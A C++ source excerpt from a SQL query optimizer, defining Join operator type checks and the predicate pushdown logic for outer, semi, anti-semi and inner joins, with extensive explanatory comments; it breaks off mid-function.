NABoolean Join::isInnerNonSemiJoin() const
{
  return getOperator().match(REL_ANY_INNER_JOIN) AND
     NOT getOperator().match(REL_ANY_SEMIJOIN);
}

NABoolean Join::isInnerNonSemiNonTSJJoin() const
{
  return (getOperator().match(REL_ANY_INNER_JOIN) AND
      NOT getOperator().match(REL_ANY_SEMIJOIN)) AND
      NOT getOperator().match(REL_ANY_TSJ);
}

NABoolean Join::isLeftJoin() const
{ return getOperator().match(REL_ANY_LEFT_JOIN); }

NABoolean Join::isRightJoin() const
{ return getOperator().match(REL_ANY_RIGHT_JOIN); }

NABoolean Join::isFullOuterJoin() const
{ return (getOperator().match(REL_ANY_FULL_JOIN)); }

NABoolean Join::isSemiJoin() const
{ return getOperator().match(REL_ANY_SEMIJOIN); }

NABoolean Join::isAntiSemiJoin() const
{ return getOperator().match(REL_ANY_ANTI_SEMIJOIN); }

NABoolean Join::isTSJ() const
{ return getOperator().match(REL_ANY_TSJ); }

NABoolean Join::isRoutineJoin() const
{ return (getOperator() == REL_ROUTINE_JOIN); }

NABoolean Join::isNonRoutineTSJ() const
{
  return ( getOperator().match(REL_ANY_TSJ) &&
         ( getOperator() != REL_ROUTINE_JOIN));
}

NABoolean Join::isNestedJoin() const
{ return getOperator().match(REL_ANY_NESTED_JOIN); }

NABoolean Join::isHashJoin() const
{ return getOperator().match(REL_ANY_HASH_JOIN); }

// Collapse the specific hash-join variants to their base family
// (plain / hybrid / ordered); INVALID_OPERATOR_TYPE for non-hash joins.
OperatorTypeEnum Join::getBaseHashType() const
{
  switch (getOperatorType())
  {
  case REL_HASH_JOIN:
  case REL_LEFT_HASH_JOIN:
  case REL_HASH_SEMIJOIN:
  case REL_HASH_ANTI_SEMIJOIN:
  case REL_ANY_HASH_JOIN:
    return REL_HASH_JOIN;
  case REL_HYBRID_HASH_JOIN:
  case REL_LEFT_HYBRID_HASH_JOIN:
  case REL_FULL_HYBRID_HASH_JOIN:
  case REL_HYBRID_HASH_SEMIJOIN:
  case REL_HYBRID_HASH_ANTI_SEMIJOIN:
    return REL_HYBRID_HASH_JOIN;
  case REL_ORDERED_HASH_JOIN:
  case REL_LEFT_ORDERED_HASH_JOIN:
  case REL_ORDERED_HASH_SEMIJOIN:
  case REL_ORDERED_HASH_ANTI_SEMIJOIN:
    return REL_ORDERED_HASH_JOIN;
  default:
    return INVALID_OPERATOR_TYPE;
  } // switch
} // Join::getBaseHashType

NABoolean Join::isMergeJoin() const
{ return getOperator().match(REL_ANY_MERGE_JOIN); }

// Map this join's operator type to the corresponding merge-join type.
OperatorTypeEnum Join::getMergeJoinOpType()
{
  switch (getOperatorType())
  {
  case REL_JOIN:
    return REL_MERGE_JOIN;
  case REL_LEFT_JOIN:
    return REL_LEFT_MERGE_JOIN;
  case REL_SEMIJOIN:
    return REL_MERGE_SEMIJOIN;
  case REL_ANTI_SEMIJOIN:
    return REL_MERGE_ANTI_SEMIJOIN;
  default:
    ABORT("Unsupported join type in Join::getMergeJoinOpType()");
    return REL_MERGE_JOIN; // return makes MSVC happy.
  } // switch
} // Join::getMergeJoinOpType()

// NOTE(review): this function continues beyond this excerpt.
void Join::pushdownCoveredExpr(const ValueIdSet & outputExpr,
                               const ValueIdSet & newExternalInputs,
                               ValueIdSet & predicatesOnParent,
                               const ValueIdSet * setOfValuesReqdByParent,
                               Lng32 childIndex
                               )
{
#ifdef NDEBUG
  NAString pushdownDebugStr(CmpCommon::statementHeap());
#define PUSHDOWN_DEBUG_SAVE(str)
#else
  Int32 PUSHDOWN_DEBUG = !!getenv("PUSHDOWN_DEBUG");
  NAString pushdownDebugStr, pushdownDebugTmp;
#define PUSHDOWN_DEBUG_SAVE(str) \
        { if (PUSHDOWN_DEBUG) \
          { pushdownDebugTmp = ""; \
            predicatesOnParent.unparse(pushdownDebugTmp); \
            pushdownDebugStr += NAString("\n") + str + ": " + pushdownDebugTmp; \
            if (PUSHDOWN_DEBUG == 99) cerr << pushdownDebugStr << endl; \
          } \
        }
  PUSHDOWN_DEBUG_SAVE("J1");
#endif

  // ----------------------------------------------------------------------
  // Note: Normally, predicatesOnParent is the set of predicates to be
  // considered for pushing down. For most of the other nodes, this set
  // is usually just the set (or maybe a subset) of selection predicates
  // the node has. However, a Join node distinguishes between selection
  // predicates (which are specified in the WHERE clause of a SQL query)
  // and join predicates (which are specified in the ON clause). The two
  // types of predicates have different criteria (as we will see later)
  // to satisfy in order to be pushed down. The predicatesOnParent supplied
  // are treated as selection predicates for the purpose of consideration
  // for pushing down. Note also that this procedure also considers the
  // pushing down of join predicates (as in joinPred_ of Join).
  // ----------------------------------------------------------------------

  // This method only supports pushing predicates down to both children,
  // but not only to one specified.
  // CMPASSERT(childIndex < 0);

  NABoolean isATSJFlag = isTSJ();
  ValueIdSet exprOnParent ;
  if (setOfValuesReqdByParent)
    exprOnParent = *setOfValuesReqdByParent;

  if (isFullOuterJoin())
  {
    // For Full Outer Join, we cannot push down the selctionPred()
    // or the joinPred() to either child0 or child1.
    // Note that for FOJ, predicates are not pulled up.

    // ---------------------------------------------------------------------
    // STEP 1: We cannot pushdown join predicates to either child,
    //         so compute values required to evaluate the joinPred()
    //         here at the parent (the Join) and add
    //         it to exprOnParent.
    // ---------------------------------------------------------------------
    computeValuesReqdForPredicates(joinPred(),
                                   exprOnParent, TRUE);

    // ---------------------------------------------------------------------
    // STEP 2: We cannot pushdown selectionPred() to either child,
    //         so compute values required to evaluate the selectionPred()
    //         here at the parent (the Join) and add
    //         it to exprOnParent.
    // ---------------------------------------------------------------------
    computeValuesReqdForPredicates(selectionPred(),
                                   exprOnParent, TRUE);

    // ---------------------------------------------------------------------
    // STEP 3: Calling pushdownCoveredExpr on an empty set, so that the child
    //         inputs and outputs are set properly.
    // ---------------------------------------------------------------------
    ValueIdSet emptySet;
    RelExpr::pushdownCoveredExpr(outputExpr,
                                 newExternalInputs,
                                 emptySet,
                                 &exprOnParent,
                                 0);

    // ---------------------------------------------------------------------
    // STEP 4: Calling pushdownCoveredExpr on an empty set, so that the child
    //         inputs and outputs are set properly.
    // ---------------------------------------------------------------------
    RelExpr::pushdownCoveredExpr(outputExpr,
                                 newExternalInputs,
                                 emptySet,
                                 &exprOnParent,
                                 1);
  } // if (isFullOuterJoin())
  // -----------------------------------------------------------------------
  // It might not be obvious, but it turns out that pushing down of
  // predicates in a Left Join is quite similar to that in an Anti-Semi
  // Join. One striking similarity is that the join predicates cannot be
  // pushed down to the left child. In both cases, pushing down join preds
  // filters out rows from the left child which shouldn't be filtered out.
  // In the case of Left Join, those rows should be null-instantiated while
  // in the case of Anti-Semi Join, they are exactly the set of rows which
  // we *should* return. (An Anti-Semi Join returns rows from the left
  // which do *not* join with rows from the right).
  // -----------------------------------------------------------------------
  else if ((isLeftJoin() || isAntiSemiJoin()) && (!isFullOuterJoin()))
  {
    // ---------------------------------------------------------------------
    // STEP 1: Try to push down the given predicatesOnParent to first child.
    // ---------------------------------------------------------------------

    // ---------------------------------------------------------------------
    // STEP 1A: Gather all values the left child must still produce even if
    //          predicates are pushed down.
    //
    // Selection predicates can only be pushed to the first child of an
    // outer join. Join predicates can only be pushed to the second. Make
    // sure the first child produces what we need for the join predicates.
    // ---------------------------------------------------------------------
    computeValuesReqdForPredicates(joinPred(),
                                   exprOnParent);

    // ---------------------------------------------------------------------
    // If this is a TSJ, the left child should also produce those values
    // that the parent needs to give as inputs to the second child.
// (Join::pushdownCoveredExpr, continued: left/anti-semi join branch)
    // ---------------------------------------------------------------------
    if (isATSJFlag)
      exprOnParent += child(1).getGroupAttr()->getCharacteristicInputs();

    // ---------------------------------------------------------------------
    // This seems to be the only difference between the case of a Left Join
    // and the case of a Anti-Semi Join. For an Anti-Semi Join, selection
    // predicates should be in terms of columns on the left child only (by
    // definition). Therefore, we don't have to worry about retaining things
    // like VEGPred(VEG{T1.a,T2.a}).
    // ---------------------------------------------------------------------
    ValueIdSet VEGEqPreds1;
    if (isLeftJoin())
    {
      // -------------------------------------------------------------------
      // Find all the VEGPreds in predicatesOnParent. VEGPred(VEG{T1.a,T2.a})
      // will be pushed down to Scan T1 even if T2.a is not available there.
      // Therefore, we still need to keep a copy of this type of predicates
      // here at this Join node where both T1.a and T2.a will be available.
      // -------------------------------------------------------------------
      predicatesOnParent.lookForVEGPredicates(VEGEqPreds1);

      // -------------------------------------------------------------------
      // Remove those VEGPreds that are covered by the input values, since
      // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after
      // it's pushed down to Scan T1.
      // -------------------------------------------------------------------
      VEGEqPreds1.removeCoveredExprs(newExternalInputs);

      // -------------------------------------------------------------------
      // Remove those VEGPreds which are not covered at second child. For
      // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3)
      // is not covered at the second child. The predicate should be pushed
      // down to the first child without being retained at JOIN2. Note that
      // since predicatesOnParent are selection predicates evaluated after
      // a Left Join, they are in terms of the null-instantiated outputs from
      // the Join rather than direct outputs from the second child.
      // -------------------------------------------------------------------
      VEGEqPreds1.removeUnCoveredExprs(nullInstantiatedOutput());
      PUSHDOWN_DEBUG_SAVE("J2");

      // -------------------------------------------------------------------
      // ??? First child not needed ??? since we are trying to push down to
      // child0, if it's uncovered, it wouldn't be pushed down anyway.
      //VEGEqPreds1.removeUnCoveredExprs(
      //  child(0).getGroupAttr()->getCharacteristicOutputs());
      // -------------------------------------------------------------------

      // -------------------------------------------------------------------
      // Since these VEGEqPreds1 will be added back to predicatesOnParent
      // after the attempt to push down to first child, make sure the first
      // child produces the required values to evaluate them.
      // -------------------------------------------------------------------
      computeValuesReqdForPredicates(VEGEqPreds1,
                                     exprOnParent);
    } // endif (isLeftJoin())

    // ---------------------------------------------------------------------
    // STEP 1B: Perform pushdown to the first child, and add VEGEqPreds
    //          back to predicatesOnParent after the push down.
    // ---------------------------------------------------------------------
    RelExpr::pushdownCoveredExpr(outputExpr,
                                 newExternalInputs,
                                 predicatesOnParent,
                                 &exprOnParent,
                                 0);

    // ---------------------------------------------------------------------
    // All selection predicates should have been pushed to the first child
    // for an Anti-Semi Join, since by definition those predicates cannot
    // involve columns from the second child.
    // ---------------------------------------------------------------------
    if (isAntiSemiJoin())
    {
      CMPASSERT(predicatesOnParent.isEmpty()
                // QSTUFF
                OR getGroupAttr()->isGenericUpdateRoot()
                // QSTUFF
               );
    }
    else
      predicatesOnParent += VEGEqPreds1;
    PUSHDOWN_DEBUG_SAVE("J3");

    // ---------------------------------------------------------------------
    // STEP 2: Try to push down the join predicates to second child.
    // ---------------------------------------------------------------------

    // ---------------------------------------------------------------------
    // STEP 2A: Gather all values the second child must still produce even
    //          if predicates are pushed down. Start with all the required
    //          values specified by the caller of this method.
    // ---------------------------------------------------------------------
    if (setOfValuesReqdByParent)
      exprOnParent = *setOfValuesReqdByParent;
    else
      exprOnParent.clear();

    // ---------------------------------------------------------------------
    // Since the remaining predicatesOnParent could not be pushed down to
    // the second child and must be evaluated on the Left Join, values reqd
    // for their evaluation must be included to make sure the second child
    // produces them. For Anti-Semi Join, predicatesOnParent is empty.
    // ---------------------------------------------------------------------
    ValueIdSet inputs = newExternalInputs;
    ValueIdSet inputsTakenOut;
    if (isLeftJoin())
    {
      computeValuesReqdForPredicates(predicatesOnParent,
                                     exprOnParent);

      // -------------------------------------------------------------------
      // Special case: If this left join is the right child of a Nested
      // Join, it could happen that the inputs we get from above already
      // contains a value which our push down logic considers to have
      // covered the predicatesOnParent which we don't attempt to push
      // down. This is a very peculiar failure of our cover logic, where
      // the predicates should have been pushed down but held back cos of
      // the semantics of an operator (case in point, the left join). To
      // deal with this, we remove from the available inputs to my child
      // those values so that the child will produce this as an output.
      //
      // NOTE(review): the disabled code below assigns to "inputTakenOut"
      // while the variable declared above is "inputsTakenOut" -- verify
      // the name before ever re-enabling this block.
      // -------------------------------------------------------------------
      // inputTakenOut = inputs;
      // predicatesOnParent.weedOutUnreferenced(inputsTakenOut);
      // inputs -= inputsTakenOut;
    }

    // ---------------------------------------------------------------------
    // Also, if this is NOT a TSJ, there are some join predicates which need
    // to be retained even if they are pushed down to the second child. All
    // Join predicates are pushable to the second child of a TSJ without
    // being retained at the TSJ. (See later for an exception)
    // ---------------------------------------------------------------------
    ValueIdSet VEGEqPreds2;
    ValueIdSet availableInputs = inputs;
    if (isATSJFlag)
    {
      availableInputs += child(0).getGroupAttr()->getCharacteristicOutputs();
    }
    else
    {
      // -------------------------------------------------------------------
      // First, find all the VEGPreds in join predicates. This is similar to
      // what we did above with predicatesOnParent. VEGPred(VEG{T1.a,T2.a})
      // will be pushed down to Scan T2 even if T1.a is not available there.
      // Therefore, we still need to keep a copy of this type of predicates
      // here at this Join node where both T1.a and T2.a will be available.
      // -------------------------------------------------------------------
      joinPred().lookForVEGPredicates(VEGEqPreds2);

      // -------------------------------------------------------------------
      // Remove those VEGPreds that are covered by the input values, since
      // VEGPred(VEG{T2.a,3}) needn't be retained at this Join node after
      // pushed down to Scan T2. (There is an exception to this. See later.)
// ------------------------------------------------------------------- VEGEqPreds2.removeCoveredExprs(availableInputs); //newExternalInputs // ------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // ------------------------------------------------------------------- VEGEqPreds2.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // ------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // ------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds2, exprOnParent); } // --------------------------------------------------------------------- // Now, there are additional join predicates that must be retained // even if they are pushable to the second child. An example would be // VEGPred(VEG{T1.a,T2.a,10}). For an inner join, this predicate can // be pushed to Scan T1 and Scan T2 and evaluated as (T1.a=10) and // (T2.a=10) respectively. However, for a Left Join or Anti-Semi Join, // this predicate (if it's a join predicate) cannot be pushed down to // the first child. The (T1.a=10) part must then be retained at this // Join node. These types of VEGPreds are those covered by T1 and the // external inputs. 
// --------------------------------------------------------------------- ValueIdSet joinPredsThatStay; joinPredsThatStay = joinPred(); ValueIdSet availableValues = availableInputs; //newExternalInputs availableValues += child(0).getGroupAttr()->getCharacteristicOutputs(); joinPredsThatStay.removeUnCoveredExprs(availableValues); // --------------------------------------------------------------------- // However, we don't want VEGPred like VEGPred(VEG{T2.a,10}) which // actually does not reference an output of T1. // --------------------------------------------------------------------- joinPredsThatStay.removeUnReferencedVEGPreds( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Also, if some inputs have been taken out deliberately, we want to // make sure other predicates which references the inputs taken out // are going to stay. Otherwise, we will have the issue that not // sufficient values are available at the child to ensure correctness // in evaluating the predicates pushed down to it. The same predicate // must be re-evaluated at this JOIN node. // --------------------------------------------------------------------- if (NOT inputsTakenOut.isEmpty()) { ValueIdSet moreJoinPredsThatStay; joinPred().lookForVEGPredicates(moreJoinPredsThatStay); moreJoinPredsThatStay.removeUnReferencedVEGPreds(inputsTakenOut); joinPredsThatStay += moreJoinPredsThatStay; } // --------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. 
// --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPredsThatStay, exprOnParent); //---------------------------------------------------------------------- // Solution 10-030728-8252: check if the second child could produce // expressions of type Instnull(CAST(aggregate)). // See if the CAST could be pushed // up. The Groupby node does not manufacture expressions of the type // cast(aggregate) as outputs in the generator. So do not ask for them //---------------------------------------------------------------------- exprOnParent.replaceInstnullCastAggregateWithAggregateInLeftJoins(this); // --------------------------------------------------------------------- // STEP 2B: Perform pushdown to the second child, and add reqd preds // back to the join predicates after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, availableInputs, joinPred(), &exprOnParent, 1); // --------------------------------------------------------------------- // Add back those predicates which must stay with the JOIN even after // they are pushed to the second child. // --------------------------------------------------------------------- joinPred() += VEGEqPreds2; joinPred() += joinPredsThatStay; PUSHDOWN_DEBUG_SAVE("J4"); } else // ----------------------------------------------------------------------- // For other types of Join's: Semi and Inner (either TSJ or non-TSJ), // processing is quite similar. Inner Joins has no join prediciates. For // Semi-Join, although we distinguish between join predicates and // selection predicates, both types of predicates are equally pushable. // The only thing is "true join VEGPreds" like VEGPred(VEG{T1.a,T2.a}) // should be retained as join predicates in a Semi-Join but as selection // predicates in an Inner Join after being pushed down. 
// (Join::pushdownCoveredExpr, continued: inner/semi join branch)
  // -----------------------------------------------------------------------
  {
    ValueIdSet predicates1 = predicatesOnParent;
    ValueIdSet predicates2 = predicatesOnParent;
    if (isSemiJoin())
    {
      // Join predicates in a Semi-Join are "as pushable as" its selection
      // predicates.
      //
      predicates1 += joinPred();
      predicates2 += joinPred();
    }
    else
    {
      // Inner Join should have no join predicates.
      CMPASSERT(joinPred().isEmpty()
                // QSTUFF
                OR getGroupAttr()->isGenericUpdateRoot()
                // QSTUFF
               );
    }

    // ---------------------------------------------------------------------
    // STEP 1: Gather all values the children must still produce even if
    //         predicates are pushed down.
    //
    // Find all the "true join VEGPreds" in predicates. E.g., VEGPred(VEG{
    // T1.a,T2.a}) will be pushed down to Scan T1 and to Scan T2 even if
    // not both values are available at either node. Therefore, we still
    // need to keep a copy of this type of predicates here at this Join node
    // where both T1.a and T2.a will be available. That means the children
    // need to provide these values to the Join node. The only exception is
    // when we are doing a TSJ. The predicates are then all pushed to the
    // right child, and the right child could then *not* provide the value
    // to the Join node if it's not a required output from the Join.
    // ---------------------------------------------------------------------
    ValueIdSet VEGEqPreds;
    predicates1.lookForVEGPredicates(VEGEqPreds);

    // ---------------------------------------------------------------------
    // Remove those VEGPreds that are covered by the input values, since
    // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after
    // it's pushed down to Scan T1.
    // ---------------------------------------------------------------------
    VEGEqPreds.removeCoveredExprs(newExternalInputs);

    // ---------------------------------------------------------------------
    // Remove those VEGPreds which are not covered at first child. For
    // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3))
    // is not covered at the first child. The predicate could be pushed
    // down to the second child without being retained at JOIN2.
    // ---------------------------------------------------------------------
    VEGEqPreds.removeUnCoveredExprs(
         child(0).getGroupAttr()->getCharacteristicOutputs());

    // ---------------------------------------------------------------------
    // Remove those VEGPreds which are not covered at second child. For
    // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3)
    // is not covered at the second child. The predicate could be pushed
    // down to the first child without being retained at JOIN2.
    // ---------------------------------------------------------------------
    VEGEqPreds.removeUnCoveredExprs(
         child(1).getGroupAttr()->getCharacteristicOutputs());

    // ---------------------------------------------------------------------
    // Since these predicates will be retained at the Join (or pushed down
    // to the second child in the case of a TSJ), make sure the first
    // child produces the required values to evaluate them.
    // ---------------------------------------------------------------------
    computeValuesReqdForPredicates(VEGEqPreds,
                                   exprOnParent);

    // ---------------------------------------------------------------------
    // First child of a TSJ should produce inputs required from the second
    // child as well.
    // ---------------------------------------------------------------------
    if (isATSJFlag)
      exprOnParent += child(1).getGroupAttr()->getCharacteristicInputs();

    // ---------------------------------------------------------------------
    // STEP 2: Try pushing down to the first child.
    // ---------------------------------------------------------------------
    RelExpr::pushdownCoveredExpr(outputExpr,
                                 newExternalInputs,
                                 predicates1,
                                 &exprOnParent,
                                 0);
    PUSHDOWN_DEBUG_SAVE("J5");

    // ---------------------------------------------------------------------
    // Find subset of predicatesOnParent which have *not* been pushed down
    // to first child.
    // ---------------------------------------------------------------------
    predicatesOnParent.intersectSet(predicates1);
    PUSHDOWN_DEBUG_SAVE("J6");

    // ---------------------------------------------------------------------
    // For a Semi-Join, all selection predicates (which should not involve
    // columns from the second child) should be pushed down to the first
    // child by now. Also get rid of the join predicates which have been
    // pushed down.
    // ---------------------------------------------------------------------
    if (isSemiJoin())
    {
      joinPred().intersectSet(predicates1);
      CMPASSERT(predicatesOnParent.isEmpty()
                // QSTUFF
                OR getGroupAttr()->isGenericUpdateRoot()
                // QSTUFF
               );
    }

    // ---------------------------------------------------------------------
    // If this is a TSJ, we do not even need to retain VEGEqPreds at the
    // Join. Everything remaining should be pushable to the right child.
    // Therefore, we don't need the right child to output values required
    // for evaluating VEGEqPreds, unless it's a required output from the
    // Join itself.
    //
    // We do not want to push the predicate down to the right child now for
    // the RoutineJoin. That will happen later when the RoutineJoin gets
    // transferred back to a TSJ/nested join by the optimizer impl rules.
    //
    // The reason we don't want it pushed here is so that the analyzer does
    // not have to differentiate what inputs are required for predicates and
    // which is required for a UDF. By knowing what inputs are required for
    // the UDF, the analyzer can determine if there is a different join order
    // that might be cheaper. We will attempt to push the predicate during
    // the optimizer phase..
    // ---------------------------------------------------------------------
    if (!isRoutineJoin())
    {
      ValueIdSet availableInputs = newExternalInputs;
      if (isATSJFlag)
      {
        if (setOfValuesReqdByParent)
          exprOnParent = *setOfValuesReqdByParent;
        else
          exprOnParent.clear();
        availableInputs += child(0).getGroupAttr()->getCharacteristicOutputs();
      }

      // ---------------------------------------------------------------------
      // STEP 3: Try pushing to second child now.
      // ---------------------------------------------------------------------
      RelExpr::pushdownCoveredExpr(outputExpr,
                                   availableInputs,
                                   predicates2,
                                   &exprOnParent,
                                   1);
    }

    // ---------------------------------------------------------------------
    // Find subset of predicatesOnParent which have *not* been pushed down
    // to second child.
    // ---------------------------------------------------------------------
    predicatesOnParent.intersectSet(predicates2);
    PUSHDOWN_DEBUG_SAVE("J7");

    if (isSemiJoin())
    {
      // -------------------------------------------------------------------
      // set joinPred to have those predicates that were not pushed down to
      // the second child.
      // -------------------------------------------------------------------
      joinPred().intersectSet(predicates2);

      // -------------------------------------------------------------------
      // If this is a semi-join that is not a TSJ we need to add all the
      // true join VEGPreds back to joinPred().
      // -------------------------------------------------------------------
      if (NOT isATSJFlag)
        joinPred() += VEGEqPreds;
      else
        // -----------------------------------------------------------------
        // If it is a TSJ all join predicates should be pushable, no preds
        // should be remaining in joinPred().
        // -----------------------------------------------------------------
        CMPASSERT(joinPred().isEmpty()
                  // QSTUFF
                  OR getGroupAttr()->isGenericUpdateRoot()
                  // QSTUFF
                 );
    }
    else
    {
      // -------------------------------------------------------------------
      // If this is a inner-join that is not a TSJ we need to add all the
      // true join VEGPreds back to selection predicates.
      // -------------------------------------------------------------------
      if (NOT isATSJFlag OR isRoutineJoin())
      {
        predicatesOnParent += VEGEqPreds;
        PUSHDOWN_DEBUG_SAVE("J9");
      }
      else
        // -----------------------------------------------------------------
        // If it is a TSJ all selection predicates should be pushable, no
        // preds should remain.
        // -----------------------------------------------------------------
        CMPASSERT(predicatesOnParent.isEmpty()
                  // QSTUFF
                  OR getGroupAttr()->isGenericUpdateRoot()
                  // QSTUFF
                 );
    }
  }
} // Join::pushdownCoveredExpr

// --------------------------------------------------------------------------
// Join::pushdownCoveredExprSQO
// Rules for pushdown from Join during the SemanticQueryOptimize(SQO)
// subphase are different in two ways from the usual.
// 1) If left child does not cover any part of a
// VEGPred it will still be retained in the Join, so that it can be pulled
// further up the query tree as we apply this transformation at other levels
// In the usual rules, the VEGPred will be pushed down to the right child
// without being retained at the Join. This behaviour is controlled by the
// boolean input parameter keepPredsNotCoveredByChild0. Similarly preds not
// covered by the right child can also be retained at the Join. This is
// controlled by keepPredsNotCoveredByChild1.
// 2) If left child is a semiJoin or a TSJ we do not push any predicates
// down that side as those selection predicates are supposed to be empty
// at this phase of compilation.
// --------------------------------------------------------------------------- void Join::pushdownCoveredExprSQO(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, ValueIdSet & setOfValuesReqdByParent, NABoolean keepPredsNotCoveredByChild0, NABoolean keepPredsNotCoveredByChild1 ) { ValueIdSet exprOnParent1 = setOfValuesReqdByParent; ValueIdSet exprOnParent = setOfValuesReqdByParent; ValueIdSet exprOnParent2 = setOfValuesReqdByParent; ValueIdSet predicates1 = predicatesOnParent; ValueIdSet predicates2 = predicatesOnParent; if (isLeftJoin()) { // --------------------------------------------------------------------- // STEP 1: Try to push down the given predicatesOnParent to first child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 1A: Gather all values the left child must still produce even if // predicates are pushed down. // // Selection predicates can only be pushed to the first child of an // outer join. Join predicates can only be pushed to the second. Make // sure the first child produces what we need for the join predicates. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPred(), exprOnParent); ValueIdSet VEGEqPreds1; // --------------------------------------------------------------------- // Find all the VEGPreds in predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T1 even if T2.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. 
// --------------------------------------------------------------------- predicatesOnParent.lookForVEGPredicates(VEGEqPreds1); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after it's // pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds1.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate should be pushed // down to the first child without being retained at JOIN2. Note that // since predicatesOnParent are selection predicates evaluated after // a Left Join, they are in terms of the null-instantiated outputs from // the Join rather than direct outputs from the second child. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild1) VEGEqPreds1.removeUnCoveredExprs(nullInstantiatedOutput()); // --------------------------------------------------------------------- // Since these VEGEqPreds1 will be added back to predicatesOnParent // after the attempt to push down to first child, make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds1, exprOnParent); // --------------------------------------------------------------------- // STEP 1B: Perform pushdown to the first child, and add VEGEqPreds // back to predicatesOnParent after the push down. 
// --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicatesOnParent, &exprOnParent, 0); // --------------------------------------------------------------------- // All selection predicates could be pushed to the first child for an // Anti-Semi Join should those predicates should involve columns from // the second child by definition. // --------------------------------------------------------------------- predicatesOnParent += VEGEqPreds1; // --------------------------------------------------------------------- // STEP 2: Try to push down the join predicates to second child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 2A: Gather all values the second child must still produce even // if predicates are pushed down. Start with all the required // values specified by the caller of this method. // --------------------------------------------------------------------- exprOnParent = outputExpr; // --------------------------------------------------------------------- // Since the remaining predicatesOnParent could not be pushed down to // the second child and must be evaluated on the Left Join, values reqd // for their evaluation must be included to make sure the second child // produces them. For Anti-Semi Join, predicatesOnParent is empty. // --------------------------------------------------------------------- ValueIdSet inputs = newExternalInputs; ValueIdSet inputsTakenOut; computeValuesReqdForPredicates(predicatesOnParent, exprOnParent); // --------------------------------------------------------------------- // Also, if this is NOT a TSJ, there are some join predicates which need // to be retained even if they are pushed down to the second child. All // Join predicates are pushable to the second child of a TSJ without // being retained at the TSJ. 
(See later for an exception) // --------------------------------------------------------------------- ValueIdSet VEGEqPreds2; ValueIdSet availableInputs = inputs; // ------------------------------------------------------------------- // First, find all the VEGPreds in join predicates. This is similar to // what we did above with predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T2 even if T1.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. // ------------------------------------------------------------------- joinPred().lookForVEGPredicates(VEGEqPreds2); // ------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T2.a,3}) needn't be retained at this Join node after // pushed down to Scan T2. (There is an exception to this. See later.) // ------------------------------------------------------------------- VEGEqPreds2.removeCoveredExprs(availableInputs); //newExternalInputs // ------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // ------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) VEGEqPreds2.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // ------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. 
// ------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds2, exprOnParent); // --------------------------------------------------------------------- // Now, there are additional join predicates that must be retained // even if they are pushable to the second child. An example would be // VEGPred(VEG{T1.a,T2.a,10}). For an inner join, this predicate can // be pushed to Scan T1 and Scan T2 and evaluated as (T1.a=10) and // (T2.a=10) respectively. However, for a Left Join or Anti-Semi Join, // this predicate (if it's a join predicate) cannot be pushed down to // the first child. The (T1.a=10) part must then be retained at this // Join node. These types of VEGPreds are those covered by T1 and the // external inputs. // --------------------------------------------------------------------- ValueIdSet joinPredsThatStay; joinPredsThatStay = joinPred(); ValueIdSet availableValues = availableInputs; //newExternalInputs availableValues += child(0).getGroupAttr()->getCharacteristicOutputs(); joinPredsThatStay.removeUnCoveredExprs(availableValues); // --------------------------------------------------------------------- // However, we don't want VEGPred like VEGPred(VEG{T2.a,10}) which // actually does not reference an output of T1. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild0) joinPredsThatStay.removeUnReferencedVEGPreds( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Also, if some inputs have been taken out deliberately, we want to // make sure other predicates which references the inputs taken out // are going to stay. Otherwise, we will have the issue that not // sufficient values are available at the child to 